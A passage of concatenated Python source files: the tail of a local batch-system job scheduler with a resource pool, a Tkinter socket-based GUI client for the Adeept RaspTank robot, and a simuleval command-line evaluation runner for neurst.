log.debug('Could not acquire enough (%s) to run job (%s). Requested: (%s), '
'Avaliable: %s. Sleeping for 10s.', e.resource, jobID, e.requested,
e.available)
with self.aquisitionCondition:
# Make threads sleep for the given delay, or until another job finishes.
# Whichever is sooner.
self.aquisitionCondition.wait(timeout=self.acquisitionRetryDelay)
continue
else:
log.debug('Finished job. self.coreFractions ~ %s and self.memory ~ %s',
self.coreFractions.value, self.memory.value)
with self.aquisitionCondition:
# Wake up sleeping threads
self.aquisitionCondition.notifyAll()
break
def issueBatchJob(self, jobNode):
"""Adds the command and resources to a queue to be run."""
# Round cores to minCores and apply scale
cores = math.ceil(jobNode.cores * self.scale / self.minCores) * self.minCores
assert cores <= self.maxCores, ('The job {} is requesting {} cores, more than the maximum of '
'{} cores this batch system was configured with. Scale is '
'set to {}.'.format(jobNode.jobName, cores, self.maxCores, self.scale))
assert cores >= self.minCores
assert jobNode.memory <= self.maxMemory, ('The job {} is requesting {} bytes of memory, more than '
'the maximum of {} this batch system was configured '
'with.'.format(jobNode.jobName, jobNode.memory, self.maxMemory))
self.checkResourceRequest(jobNode.memory, cores, jobNode.disk)
log.debug("Issuing the command: %s with memory: %i, cores: %i, disk: %i" % (
jobNode.command, jobNode.memory, cores, jobNode.disk))
with self.jobIndexLock:
jobID = self.jobIndex
self.jobIndex += 1
self.jobs[jobID] = jobNode.command
self.inputQueue.put((jobNode.command, jobID, cores, jobNode.memory,
jobNode.disk, self.environment.copy()))
if self.debugWorker: # then run immediately, blocking for return
self.worker(self.inputQueue)
return jobID
def killBatchJobs(self, jobIDs):
"""Kills jobs by ID."""
log.debug('Killing jobs: {}'.format(jobIDs))
for jobID in jobIDs:
if jobID in self.runningJobs:
info = self.runningJobs[jobID]
info.killIntended = True
if info.popen != None:
os.kill(info.popen.pid, 9)
else:
# No popen if running in forkless mode currently
assert self.debugWorker
log.critical("Can't kill job: %s in debug mode" % jobID)
while jobID in self.runningJobs:
pass
def getIssuedBatchJobIDs(self):
"""Just returns all the jobs that have been run, but not yet returned as updated."""
return list(self.jobs.keys())
def getRunningBatchJobIDs(self):
now = time.time()
return {jobID: now - info.time for jobID, info in list(self.runningJobs.items())}
def shutdown(self):
"""
Cleanly terminate worker threads. Add sentinels to inputQueue equal to maxThreads. Join
all worker threads.
"""
# Remove reference to inputQueue (raises exception if inputQueue is used after method call)
inputQueue = self.inputQueue
self.inputQueue = None
for i in range(self.numWorkers):
inputQueue.put(None)
for thread in self.workerThreads:
thread.join()
BatchSystemSupport.workerCleanup(self.workerCleanupInfo)
def getUpdatedBatchJob(self, maxWait):
"""Returns a map of the run jobs and the return value of their processes."""
try:
item = self.outputQueue.get(timeout=maxWait)
except Empty:
return None
jobID, exitValue, wallTime = item
jobCommand = self.jobs.pop(jobID)
log.debug("Ran jobID: %s with exit value: %i", jobID, exitValue)
return jobID, exitValue, wallTime
@classmethod
def setOptions(cls, setOption):
setOption("scale", default=1)
class Info(object):
# Can't use namedtuple here since killIntended needs to be mutable
def __init__(self, startTime, popen, killIntended):
self.time = startTime
self.popen = popen
self.killIntended = killIntended
class ResourcePool(object):
def __init__(self, initial_value, resourceType, timeout):
super(ResourcePool, self).__init__()
self.condition = Condition()
self.value = initial_value
self.resourceType = resourceType
self.timeout = timeout
def acquire(self, amount):
with self.condition:
startTime = time.time()
while amount > self.value:
if time.time() - startTime >= self.timeout:
# This means the thread timed out waiting for the resource. We exit the nested
# context managers in worker to prevent blocking of a resource due to
# unavailability of a nested resource request.
raise self.AcquisitionTimeoutException(resource=self.resourceType,
requested=amount, available=self.value)
# Allow 5 seconds to get the resource, else quit through the above if condition.
# This wait + timeout is the last thing in the loop such that a request that takes
# longer than 5s due to multiple wakes under the 5 second threshold are still
# honored.
self.condition.wait(timeout=self.timeout)
self.value -= amount
self.__validate()
def release(self, amount):
with self.condition:
self.value += amount
self.__validate()
self.condition.notifyAll()
def __validate(self):
assert 0 <= self.value
def __str__(self):
return str(self.value)
def __repr__(self):
return "ResourcePool(%i)" % self.value
@contextmanager
def acquisitionOf(self, amount):
self.acquire(amount)
try:
yield
finally:
self.release(amount)
class AcquisitionTimeoutException(Exception):
"""To be raised when a resource request times out."""
def __init__(self, resource, requested, available):
"""
Creates an instance of this exception that indicates which resource is insufficient for
current demands, as well as the amount requested and amount actually available.
:param str resource: string representing the resource type
:param int|float requested: the amount of the particular resource requested that resulted
in this exception
:param int|float available: amount of the particular resource actually available
"""
self.requested = requested
self.available = available
self.resource = resource
|
GUI.py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# File name : client.py
# Description : client
# Website : www.adeept.com
# E-mail : support@adeept.com
# Author : William
# Date : 2018/08/22
#
import cv2
import zmq
import base64
import numpy as np
from socket import *
import sys
import time
import threading as thread
import tkinter as tk
ip_stu=1 #Shows connection status
c_f_stu = 0
c_b_stu = 0
c_l_stu = 0
c_r_stu = 0
c_ls_stu= 0
c_rs_stu= 0
funcMode= 0
tcpClicSock = ''
root = ''
stat = 0
ultra_data = 'Ultrasonic OFF'
########>>>>>VIDEO<<<<<########
def video_thread():
global footage_socket, font, frame_num, fps
context = zmq.Context()
footage_socket = context.socket(zmq.SUB)
footage_socket.bind('tcp://*:5555')
footage_socket.setsockopt_string(zmq.SUBSCRIBE, np.unicode(''))
font = cv2.FONT_HERSHEY_SIMPLEX
frame_num = 0
fps = 0
def get_FPS():
global frame_num, fps
while 1:
try:
time.sleep(1)
fps = frame_num
frame_num = 0
except:
time.sleep(1)
def opencv_r():
global frame_num
while True:
try:
frame = footage_socket.recv_string()
img = base64.b64decode(frame)
npimg = np.frombuffer(img, dtype=np.uint8)
source = cv2.imdecode(npimg, 1)
cv2.putText(source,('PC FPS: %s'%fps),(40,20), font, 0.5,(255,255,255),1,cv2.LINE_AA)
try:
cv2.putText(source,('CPU Temperature: %s'%CPU_TEP),(370,350), font, 0.5,(128,255,128),1,cv2.LINE_AA)
cv2.putText(source,('CPU Usage: %s'%CPU_USE),(370,380), font, 0.5,(128,255,128),1,cv2.LINE_AA)
cv2.putText(source,('RAM Usage: %s'%RAM_USE),(370,410), font, 0.5,(128,255,128),1,cv2.LINE_AA)
if ultrasonicMode == 1:
cv2.line(source,(320,240),(260,300),(255,255,255),1)
cv2.line(source,(210,300),(260,300),(255,255,255),1)
cv2.putText(source,('%sm'%ultra_data),(210,290), font, 0.5,(255,255,255),1,cv2.LINE_AA)
except:
pass
#cv2.putText(source,('%sm'%ultra_data),(210,290), font, 0.5,(255,255,255),1,cv2.LINE_AA)
cv2.imshow("Stream", source)
frame_num += 1
cv2.waitKey(1)
except:
time.sleep(0.5)
break
fps_threading=thread.Thread(target=get_FPS) #Define a thread for FPV and OpenCV
fps_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
fps_threading.start() #Thread starts
video_threading=thread.Thread(target=video_thread) #Define a thread for FPV and OpenCV
video_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
video_threading.start() #Thread starts
########>>>>>VIDEO<<<<<########
def replace_num(initial,new_num): #Call this function to replace data in '.txt' file
newline=""
str_num=str(new_num)
with open("ip.txt","r") as f:
for line in f.readlines():
if(line.find(initial) == 0):
line = initial+"%s" %(str_num)
newline += line
with open("ip.txt","w") as f:
f.writelines(newline) #Call this function to replace data in '.txt' file
def num_import(initial): #Call this function to import data from '.txt' file
with open("ip.txt") as f:
for line in f.readlines():
if(line.find(initial) == 0):
r=line
begin=len(list(initial))
snum=r[begin:]
n=snum
return n
def call_forward(event): #When this function is called,client commands the car to move forward
global c_f_stu
if c_f_stu == 0:
tcpClicSock.send(('forward').encode())
c_f_stu=1
def call_back(event): #When this function is called,client commands the car to move backward
global c_b_stu
if c_b_stu == 0:
tcpClicSock.send(('backward').encode())
c_b_stu=1
def call_FB_stop(event): #When this function is called,client commands the car to stop moving
global c_f_stu,c_b_stu,c_l_stu,c_r_stu,c_ls_stu,c_rs_stu
c_f_stu=0
c_b_stu=0
tcpClicSock.send(('DS').encode())
def call_Turn_stop(event): #When this function is called,client commands the car to stop moving
global c_f_stu,c_b_stu,c_l_stu,c_r_stu,c_ls_stu,c_rs_stu
c_l_stu=0
c_r_stu=0
c_ls_stu=0
c_rs_stu=0
tcpClicSock.send(('TS').encode())
def call_Left(event): #When this function is called,client commands the car to turn left
global c_l_stu
if c_l_stu == 0:
tcpClicSock.send(('left').encode())
c_l_stu=1
def call_Right(event): #When this function is called,client commands the car to turn right
global c_r_stu
if c_r_stu == 0:
tcpClicSock.send(('right').encode())
c_r_stu=1
def call_LeftSide(event):
tcpClicSock.send(('out').encode())
def call_RightSide(event):
tcpClicSock.send(('in').encode())
def call_CLeft(event):
tcpClicSock.send(('c_left').encode())
def call_CRight(event):
tcpClicSock.send(('c_right').encode())
def call_headup(event):
tcpClicSock.send(('headup').encode())
def call_headdown(event):
tcpClicSock.send(('headdown').encode())
def call_headleft(event):
tcpClicSock.send(('catch').encode())
def call_headright(event):
tcpClicSock.send(('loose').encode())
def call_headhome(event):
tcpClicSock.send(('headhome').encode())
def call_steady(event):
global ultrasonicMode
if funcMode == 0:
tcpClicSock.send(('steady').encode())
ultrasonicMode = 1
else:
tcpClicSock.send(('funEnd').encode())
def call_FindColor(event):
if funcMode == 0:
tcpClicSock.send(('FindColor').encode())
else:
tcpClicSock.send(('funEnd').encode())
def call_WatchDog(event):
if funcMode == 0:
tcpClicSock.send(('WatchDog').encode())
else:
tcpClicSock.send(('funEnd').encode())
def call_FindLine(event):
if funcMode == 0:
tcpClicSock.send(('FindLine').encode())
else:
tcpClicSock.send(('funEnd').encode())
def all_btn_red():
Btn_Steady.config(bg='#FF6D00', fg='#000000')
Btn_FindColor.config(bg='#FF6D00', fg='#000000')
Btn_WatchDog.config(bg='#FF6D00', fg='#000000')
Btn_Fun4.config(bg='#FF6D00', fg='#000000')
Btn_Fun5.config(bg='#FF6D00', fg='#000000')
Btn_Fun6.config(bg='#FF6D00', fg='#000000')
def all_btn_normal():
Btn_Steady.config(bg=color_btn, fg=color_text)
Btn_FindColor.config(bg=color_btn, fg=color_text)
Btn_WatchDog.config(bg=color_btn, fg=color_text)
Btn_Fun4.config(bg=color_btn, fg=color_text)
Btn_Fun5.config(bg=color_btn, fg=color_text)
Btn_Fun6.config(bg=color_btn, fg=color_text)
def connection_thread():
global funcMode, ultrasonicMode, canvas_rec, canvas_text
while 1:
car_info = (tcpClicSock.recv(BUFSIZ)).decode()
if not car_info:
continue
elif 'FindColor' in car_info:
funcMode = 1
all_btn_red()
Btn_FindColor.config(bg='#00E676')
elif 'steady' in car_info:
funcMode = 1
all_btn_red()
Btn_Steady.config(bg='#00E676')
elif 'WatchDog' in car_info:
funcMode = 1
all_btn_red()
Btn_WatchDog.config(bg='#00E676')
elif 'FindLine' in car_info:
funcMode = 1
all_btn_red()
Btn_Fun4.config(bg='#00E676')
elif 'FunEnd' in car_info:
funcMode = 0
all_btn_normal()
ultrasonicMode = 0
canvas_rec=canvas_ultra.create_rectangle(0,0,352,30,fill = color_btn,width=0)
canvas_text=canvas_ultra.create_text((90,11),text='Ultrasonic OFF',fill=color_text)
def instruction():
instructions = []
while 1:
instruction_1 = 'You can use shortcuts to control the robot'
instructions.append(instruction_1)
instruction_2 = 'W: Forward S: Backward A: Turn left D: Turn right'
instructions.append(instruction_2)
instruction_3 = 'I: Look up K: Look down J: Grab L: Loose'
instructions.append(instruction_3)
instruction_4 = 'Q: Hand reaches out E: Hand takes back U & O: Hand rotation'
instructions.append(instruction_4)
instruction_5 = 'F(the Home button on GUI): Arm and head return to original positionl position'
instructions.append(instruction_5)
instruction_6 = 'then the PWM of servos will be set to 0'
instructions.append(instruction_6)
instruction_7 = 'for better battery and servo maintenance'
instructions.append(instruction_7)
for ins_show in instructions:
label_ins.config(text=ins_show)
time.sleep(4)
def Info_receive():
global CPU_TEP,CPU_USE,RAM_USE
HOST = ''
INFO_PORT = 2256 #Define port serial
ADDR = (HOST, INFO_PORT)
InfoSock = socket(AF_INET, SOCK_STREAM)
InfoSock.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)
InfoSock.bind(ADDR)
InfoSock.listen(5) #Start server,waiting for client
InfoSock, addr = InfoSock.accept()
print('Info connected')
while 1:
try:
info_data = ''
info_data = str(InfoSock.recv(BUFSIZ).decode())
info_get = info_data.split()
CPU_TEP,CPU_USE,RAM_USE= info_get
#print('cpu_tem:%s\ncpu_use:%s\nram_use:%s'%(CPU_TEP,CPU_USE,RAM_USE))
CPU_TEP_lab.config(text='CPU Temp: %s℃'%CPU_TEP)
CPU_USE_lab.config(text='CPU Usage: %s'%CPU_USE)
RAM_lab.config(text='RAM Usage: %s'%RAM_USE)
except:
pass
def ultra_receive():
global ultra_data, canvas_text, canvas_rec
ultra_HOST = ''
ultra_PORT = 2257 #Define port serial
ultra_ADDR = (ultra_HOST, ultra_PORT)
ultra_Sock = socket(AF_INET, SOCK_STREAM)
ultra_Sock.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)
ultra_Sock.bind(ultra_ADDR)
ultra_Sock.listen(5) #Start server,waiting for client
ultra_Sock, addr = ultra_Sock.accept()
canvas_text=canvas_ultra.create_text((90,11),text='Ultrasonic OFF',fill=color_text)
while 1:
try:
ultra_data = str(ultra_Sock.recv(BUFSIZ).decode())
try:
ultra_data = float(ultra_data)
if float(ultra_data) < 3:
#print(ultra_data)
try:
canvas_ultra.delete(canvas_text)
canvas_ultra.delete(canvas_rec)
except:
pass
#canvas_rec=canvas_ultra.create_rectangle(0,0,int(float(ultra_data)/145*3),30,fill = '#FFFFFF')
canvas_rec=canvas_ultra.create_rectangle(0,0,(352-int(float(ultra_data)*352/3)),30,fill = '#448AFF',width=0)
canvas_text=canvas_ultra.create_text((90,11),text='Ultrasonic Output: %sm'%ultra_data,fill=color_text)
#print('xxx')
except:
pass
except:
pass
def socket_connect(): #Call this function to connect with the server
global ADDR,tcpClicSock,BUFSIZ,ip_stu,ipaddr
ip_adr=E1.get() #Get the IP address from Entry
if ip_adr == '': #If no input IP address in Entry,import a default IP
ip_adr=num_import('IP:')
l_ip_4.config(text='Connecting')
l_ip_4.config(bg='#FF8F00')
l_ip_5.config(text='Default:%s'%ip_adr)
pass
SERVER_IP = ip_adr
SERVER_PORT = 10223 #Define port serial
BUFSIZ = 1024 #Define buffer size
ADDR = (SERVER_IP, SERVER_PORT)
tcpClicSock = socket(AF_INET, SOCK_STREAM) #Set connection value for socket
for i in range (1,6): #Try 5 times if disconnected
if ip_stu == 1:
print("Connecting to server @ %s:%d..." %(SERVER_IP, SERVER_PORT))
print("Connecting")
tcpClicSock.connect(ADDR) #Connection with the server
print("Connected")
l_ip_5.config(text='IP:%s'%ip_adr)
l_ip_4.config(text='Connected')
l_ip_4.config(bg='#558B2F')
replace_num('IP:',ip_adr)
E1.config(state='disabled') #Disable the Entry
Btn14.config(state='disabled') #Disable the Entry
ip_stu=0 #'0' means connected
connection_threading=thread.Thread(target=connection_thread) #Define a thread for FPV and OpenCV
connection_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
connection_threading.start() #Thread starts
info_threading=thread.Thread(target=Info_receive) #Define a thread for FPV and OpenCV
info_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
info_threading.start() #Thread starts
ultra_threading=thread.Thread(target=ultra_receive) #Define a thread for FPV and OpenCV
ultra_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
ultra_threading.start() #Thread starts
video_threading=thread.Thread(target=opencv_r) #Define a thread for FPV and OpenCV
video_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
video_threading.start() #Thread starts
break
else:
print("Cannot connecting to server,try it latter!")
l_ip_4.config(text='Try %d/5 time(s)'%i)
l_ip_4.config(bg='#EF6C00')
print('Try %d/5 time(s)'%i)
ip_stu=1
time.sleep(1)
continue
if ip_stu == 1:
l_ip_4.config(text='Disconnected')
l_ip_4.config(bg='#F44336')
def connect(event): #Call this function to connect with the server
if ip_stu == 1:
sc=thread.Thread(target=socket_connect) #Define a thread for connection
sc.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
sc.start() #Thread starts
def connect_click(): #Call this function to connect with the server
if ip_stu == 1:
sc=thread.Thread(target=socket_connect) #Define a thread for connection
sc.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
sc.start() #Thread starts
def set_R(event):
time.sleep(0.03)
tcpClicSock.send(('wsR %s'%var_R.get()).encode())
def set_G(event):
time.sleep(0.03)
tcpClicSock.send(('wsG %s'%var_G.get()).encode())
def set_B(event):
time.sleep(0.03)
tcpClicSock.send(('wsB %s'%var_B.get()).encode())
def loop(): #GUI
global tcpClicSock,root,E1,connect,l_ip_4,l_ip_5,color_btn,color_text,Btn14,CPU_TEP_lab,CPU_USE_lab,RAM_lab,canvas_ultra,color_text,var_R,var_B,var_G,Btn_Steady,Btn_FindColor,Btn_WatchDog,Btn_Fun4,Btn_Fun5,Btn_Fun6,label_ins #The value of tcpClicSock changes in the function loop(),would also changes in global so the other functions could use it.
while True:
color_bg='#000000' #Set background color
color_text='#E1F5FE' #Set text color
color_btn='#0277BD' #Set button color
color_line='#01579B' #Set line color
color_can='#212121' #Set canvas color
color_oval='#2196F3' #Set oval color
target_color='#FF6D00'
root = tk.Tk() #Define a window named root
root.title('Adeept RaspTank') #Main window title
root.geometry('565x510') #Main window size, middle of the English letter x.
root.config(bg=color_bg) #Set the background color of root window
try:
logo =tk.PhotoImage(file = 'logo.png') #Define the picture of logo,but only supports '.png' and '.gif'
l_logo=tk.Label(root,image = logo,bg=color_bg) #Set a label to show the logo picture
l_logo.place(x=30,y=13) #Place the Label in a right position
except:
pass
CPU_TEP_lab=tk.Label(root,width=18,text='CPU Temp:',fg=color_text,bg='#212121')
CPU_TEP_lab.place(x=400,y=15) #Define a Label and put it in position
CPU_USE_lab=tk.Label(root,width=18,text='CPU Usage:',fg=color_text,bg='#212121')
CPU_USE_lab.place(x=400,y=45) #Define a Label and put it in position
RAM_lab=tk.Label(root,width=18,text='RAM Usage:',fg=color_text,bg='#212121')
RAM_lab.place(x=400,y=75) #Define a Label and put it in position
l_ip=tk.Label(root,width=18,text='Status',fg=color_text,bg=color_btn)
l_ip.place(x=30,y=110) #Define a Label and put it in position
l_ip_4=tk.Label(root,width=18,text='Disconnected',fg=color_text,bg='#F44336')
l_ip_4.place(x=400,y=110) #Define a Label and put it in position
l_ip_5=tk.Label(root,width=18,text='Use default IP',fg=color_text,bg=color_btn)
l_ip_5.place(x=400,y=145) #Define a Label and put it in position
label_ins=tk.Label(root,width=71,text='Instruction',fg=color_text,bg=color_btn)
label_ins.place(x=30,y=300) #Define a Label and put it in position
E1 = tk.Entry(root,show=None,width=16,bg="#37474F",fg='#eceff1')
E1.place(x=180,y=40) #Define a Entry and put it in position
l_ip_3=tk.Label(root,width=10,text='IP Address:',fg=color_text,bg='#000000')
l_ip_3.place(x=175,y=15) #Define a Label and put it in position
label_openCV=tk.Label(root,width=28,text='OpenCV Status',fg=color_text,bg=color_btn)
label_openCV.place(x=180,y=110) #Define a Label and put it in position
canvas_ultra=tk.Canvas(root,bg=color_btn,height=23,width=352,highlightthickness=0)
canvas_ultra.place(x=30,y=145)
################################
#canvas_rec=canvas_ultra.create_rectangle(0,0,340,30,fill = '#FFFFFF',width=0)
#canvas_text=canvas_ultra.create_text((90,11),text='Ultrasonic Output: 0.75m',fill=color_text)
################################
Btn0 = tk.Button(root, width=8, text='Forward',fg=color_text,bg=color_btn,relief='ridge')
Btn1 = tk.Button(root, width=8, text='Backward',fg=color_text,bg=color_btn,relief='ridge')
Btn2 = tk.Button(root, width=8, text='Left',fg=color_text,bg=color_btn,relief='ridge')
Btn3 = tk.Button(root, width=8, text='Right',fg=color_text,bg=color_btn,relief='ridge')
Btn_LeftSide = tk.Button(root, width=8, text='<--',fg=color_text,bg=color_btn,relief='ridge')
Btn_LeftSide.place(x=30,y=195)
Btn_LeftSide.bind('<ButtonPress-1>', call_LeftSide)
Btn_LeftSide.bind('<ButtonRelease-1>', call_Turn_stop)
Btn_RightSide = tk.Button(root, width=8, text='-->',fg=color_text,bg=color_btn,relief='ridge')
Btn_RightSide.place(x=170,y=195)
Btn_RightSide.bind('<ButtonPress-1>', call_RightSide)
Btn_RightSide.bind('<ButtonRelease-1>', call_Turn_stop)
Btn0.place(x=100,y=195)
Btn1.place(x=100,y=230)
Btn2.place(x=30,y=230)
Btn3.place(x=170,y=230)
Btn0.bind('<ButtonPress-1>', call_forward)
Btn1.bind('<ButtonPress-1>', call_back)
Btn2.bind('<ButtonPress-1>', call_Left)
Btn3.bind('<ButtonPress-1>', call_Right)
Btn0.bind('<ButtonRelease-1>', call_FB_stop)
Btn1.bind('<ButtonRelease-1>', call_FB_stop)
Btn2.bind('<ButtonRelease-1>', call_Turn_stop)
Btn3.bind('<ButtonRelease-1>', call_Turn_stop)
root.bind('<KeyPress-w>', call_forward)
root.bind('<KeyPress-a>', call_Left)
root.bind('<KeyPress-d>', call_Right)
root.bind('<KeyPress-s>', call_back)
root.bind('<KeyPress-q>', call_LeftSide)
root.bind('<KeyPress-e>', call_RightSide)
root.bind('<KeyRelease-q>', call_Turn_stop)
root.bind('<KeyRelease-e>', call_Turn_stop)
root.bind('<KeyRelease-w>', call_FB_stop)
root.bind('<KeyRelease-a>', call_Turn_stop)
root.bind('<KeyRelease-d>', call_Turn_stop)
root.bind('<KeyRelease-s>', call_FB_stop)
Btn_up = tk.Button(root, width=8, text='Up',fg=color_text,bg=color_btn,relief='ridge')
Btn_down = tk.Button(root, width=8, text='Down',fg=color_text,bg=color_btn,relief='ridge')
Btn_left = tk.Button(root, width=8, text='Grab',fg=color_text,bg=color_btn,relief='ridge')
Btn_right = tk.Button(root, width=8, text='Loose',fg=color_text,bg=color_btn,relief='ridge')
Btn_home = tk.Button(root, width=8, text='Home',fg=color_text,bg=color_btn,relief='ridge')
Btn_up.place(x=400,y=195)
Btn_down.place(x=400,y=230)
Btn_left.place(x=330,y=230)
Btn_right.place(x=470,y=230)
Btn_home.place(x=250,y=230)
Btn_Cleft = tk.Button(root, width=8, text='\\',fg=color_text,bg=color_btn,relief='ridge')
Btn_Cright = tk.Button(root, width=8, text='/',fg=color_text,bg=color_btn,relief='ridge')
Btn_Cleft.place(x=330, y=195)
Btn_Cright.place(x=470, y=195)
root.bind('<KeyPress-u>', call_CLeft)
root.bind('<KeyPress-o>', call_CRight)
root.bind('<KeyPress-i>', call_headup)
root.bind('<KeyPress-k>', call_headdown)
root.bind('<KeyPress-j>', call_headleft)
root.bind('<KeyPress-l>', call_headright)
root.bind('<KeyPress-f>', call_headhome)
Btn_Cleft.bind('<ButtonPress-1>', call_CLeft)
Btn_Cright.bind('<ButtonPress-1>', call_CRight)
Btn_up.bind('<ButtonPress-1>', call_headup)
Btn_down.bind('<ButtonPress-1>', call_headdown)
Btn_left.bind('<ButtonPress-1>', call_headleft)
Btn_right.bind('<ButtonPress-1>', call_headright)
Btn_home.bind('<ButtonPress-1>', call_headhome)
Btn14= tk.Button(root, width=8,height=2, text='Connect',fg=color_text,bg=color_btn,command=connect_click,relief='ridge')
Btn14.place(x=315,y=15) #Define a Button and put it in position
root.bind('<Return>', connect)
var_R = tk.StringVar()
var_R.set(0)
Scale_R = tk.Scale(root,label=None,
from_=0,to=255,orient=tk.HORIZONTAL,length=505,
showvalue=1,tickinterval=None,resolution=1,variable=var_R,troughcolor='#F44336',command=set_R,fg=color_text,bg=color_bg,highlightthickness=0)
Scale_R.place(x=30,y=330) #Define a Scale and put it in position
var_G = tk.StringVar()
var_G.set(0)
Scale_G = tk.Scale(root,label=None,
from_=0,to=255,orient=tk.HORIZONTAL,length=505,
showvalue=1,tickinterval=None,resolution=1,variable=var_G,troughcolor='#00E676',command=set_G,fg=color_text,bg=color_bg,highlightthickness=0)
Scale_G.place(x=30,y=360) #Define a Scale and put it in position
var_B = tk.StringVar()
var_B.set(0)
Scale_B = tk.Scale(root,label=None,
from_=0,to=255,orient=tk.HORIZONTAL,length=505,
showvalue=1,tickinterval=None,resolution=1,variable=var_B,troughcolor='#448AFF',command=set_B,fg=color_text,bg=color_bg,highlightthickness=0)
Scale_B.place(x=30,y=390) #Define a Scale and put it in position
canvas_cover=tk.Canvas(root,bg=color_bg,height=30,width=510,highlightthickness=0)
canvas_cover.place(x=30,y=420)
Btn_Steady = tk.Button(root, width=10, text='Ultrasonic',fg=color_text,bg=color_btn,relief='ridge')
Btn_Steady.place(x=30,y=445)
root.bind('<KeyPress-z>', call_steady)
Btn_Steady.bind('<ButtonPress-1>', call_steady)
Btn_FindColor = tk.Button(root, width=10, text='FindColor',fg=color_text,bg=color_btn,relief='ridge')
Btn_FindColor.place(x=115,y=445)
root.bind('<KeyPress-z>', call_FindColor)
Btn_FindColor.bind('<ButtonPress-1>', call_FindColor)
Btn_WatchDog = tk.Button(root, width=10, text='WatchDog',fg=color_text,bg=color_btn,relief='ridge')
Btn_WatchDog.place(x=200,y=445)
root.bind('<KeyPress-z>', call_WatchDog)
Btn_WatchDog.bind('<ButtonPress-1>', call_WatchDog)
Btn_Fun4 = tk.Button(root, width=10, text='FindLine',fg=color_text,bg=color_btn,relief='ridge')
Btn_Fun4.place(x=285,y=445)
root.bind('<KeyPress-z>', call_FindLine)
Btn_Fun4.bind('<ButtonPress-1>', call_FindLine)
Btn_Fun5 = tk.Button(root, width=10, text='Function 5',fg=color_text,bg=color_btn,relief='ridge')
Btn_Fun5.place(x=370,y=445)
root.bind('<KeyPress-z>', call_WatchDog)
Btn_Fun5.bind('<ButtonPress-1>', call_WatchDog)
Btn_Fun6 = tk.Button(root, width=10, text='Function 6',fg=color_text,bg=color_btn,relief='ridge')
Btn_Fun6.place(x=455,y=445)
root.bind('<KeyPress-z>', call_WatchDog)
Btn_Fun6.bind('<ButtonPress-1>', call_WatchDog)
ins_threading=thread.Thread(target=instruction) #Define a thread for FPV and OpenCV
ins_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
ins_threading.start() #Thread starts
global stat
if stat==0: # Ensure the mainloop runs only once
root.mainloop() # Run the mainloop()
stat=1 # Change the value to '1' so the mainloop() would not run again.
if __name__ == '__main__':
try:
loop() # Load GUI
except:
tcpClicSock.close() # Close socket or it may not connect with the server again
footage_socket.close()
cv2.destroyAllWindows()
pass
|
simuleval_cli.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
try:
from simuleval import READ_ACTION, WRITE_ACTION, options
from simuleval.cli import DataWriter, server
from simuleval.online import start_client, start_server
from simuleval.utils.agent_finder import find_agent_cls
from simuleval.utils.functional import split_list_into_chunks
except ModuleNotFoundError:
pass
import importlib
import json
import logging
import os
import sys
import time
from functools import partial
from multiprocessing import Manager, Pool, Process
from neurst.utils.registry import get_registered_class
logging.basicConfig(
format='%(asctime)s | %(levelname)-8s | %(name)-16s | %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.INFO,
stream=sys.stderr,
)
logger = logging.getLogger('simuleval.cli')
# added here
def init():
global tf
import tensorflow as tf
tf.config.experimental.set_memory_growth(tf.config.experimental.list_physical_devices('GPU')[0], True)
def evaluate(args, client, server_process=None):
info = client.corpus_info()
num_sentences = info['num_sentences']
indices = list(range(num_sentences))
num_processes = args.num_processes
manager = Manager()
result_queue = manager.Queue()
data_writer = DataWriter(args, result_queue)
if num_processes > 1:
if num_processes > num_sentences:
logger.warn(
f"Number of processes is larger than number sentences ({num_processes}, {num_sentences})."
f"Will only use {num_sentences} processes"
)
num_processes = num_sentences
# Multi process, split test set into num_processes pieces
# added here
with Pool(args.num_processes, initializer=init) as p:
p.map(
partial(decode, args, client, result_queue),
split_list_into_chunks(indices, num_processes),
)
else:
decode(args, client, result_queue, indices)
scores = client.get_scores()
logger.info("Evaluation results:\n" + json.dumps(scores, indent=4))
logger.info("Evaluation finished")
data_writer.write_scores(scores)
data_writer.kill()
if server_process is not None:
server_process.kill()
logger.info("Shutdown server")
def decode(args, client, result_queue, instance_ids):
# Find agent and load related arguments
if os.path.exists(args.agent):
agent_name, agent_cls = find_agent_cls(args)
else:
agent_cls = get_registered_class(args.agent, "simuleval_agent")
agent_name = agent_cls.__name__
logger.info(
f"Evaluating {agent_name} (process id {os.getpid()}) "
f"on instances from {instance_ids[0]} to {instance_ids[-1]}"
)
parser = options.general_parser()
options.add_agent_args(parser, agent_cls)
args, _ = parser.parse_known_args()
# Data type check
info = client.corpus_info()
data_type = info['data_type']
if data_type != agent_cls.data_type:
logger.error(
f"Data type mismatch 'server.data_type {data_type}', "
f"'{args.agent_cls}.data_type: {args.agent_cls.data_type}'")
sys.exit(1)
# build agents
agent = agent_cls(args)
# Decode
for instance_id in instance_ids:
states = agent.build_states(args, client, instance_id)
while not states.finish_hypo():
action = agent.policy(states)
if action == READ_ACTION:
states.update_source()
elif action == WRITE_ACTION:
prediction = agent.predict(states)
states.update_target(prediction)
else:
raise SystemExit(f"Undefined action name {action}")
sent_info = client.get_scores(instance_id)
result_queue.put(sent_info)
logger.debug(f"Instance {instance_id} finished, results:\n{json.dumps(sent_info, indent=4)}")
def _main(client_only=False):
parser = options.general_parser()
options.add_server_args(parser)
if not client_only:
options.add_data_args(parser)
args, _ = parser.parse_known_args()
if not client_only:
if os.path.exists(args.agent):
_, agent_cls = find_agent_cls(args)
else:
agent_cls = get_registered_class(args.agent, "simuleval_agent")
if args.data_type is None:
args.data_type = agent_cls.data_type
logging.getLogger("tornado.access").setLevel(logging.WARNING)
server_process = Process(
target=start_server, args=(args,))
server_process.start()
time.sleep(3)
else:
server_process = None
client = start_client(args)
evaluate(args, client, server_process)
